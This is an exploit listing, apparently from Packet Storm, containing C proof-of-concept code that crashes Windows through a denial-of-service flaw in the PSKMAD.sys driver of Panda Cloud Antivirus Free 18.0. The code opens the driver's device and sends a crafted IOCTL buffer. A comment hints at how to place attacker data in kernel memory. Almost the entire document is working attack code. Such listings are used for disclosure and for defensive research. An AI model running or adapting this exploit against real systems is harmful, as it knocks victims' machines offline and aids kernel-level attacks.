Panda Cloud Antivirus Free version 18.0 suffers from a PSKMAD.sys denial of service vulnerability.
a6bac1e24962b0e5e457f5b1f41cfd2f18bc6f49630f5250be3fb14fadab90ef*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;
hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);
return hFile;
}
int main()
{
HANDLE hFile = NULL;
PVOID64 lpInBuffer = NULL;
ULONG64 lpBytesReturned;
PVOID64 BuffAddress = NULL;
SIZE_T BufferSize = 0x800;
printf("Trying the get the handle for the PSMEMDriver device.\r\n");
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
return 1;
}
// Allocate memory for our buffer
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (lpInBuffer == NULL) {
printf("VirtualAlloc() failed. \r\n");
return 1;
}
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
*(PULONG64)BuffAddress = (ULONG64)0x42424242;
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
DeviceIoControl(hFile,
0xb3702c38,
lpInBuffer,
NULL, //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
NULL,
NULL,
&lpBytesReturned,
NULL);
/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
printf("Cleaning up.\r\n");
VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
CloseHandle(hFile);
printf("Resources freed up.\r\n");
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed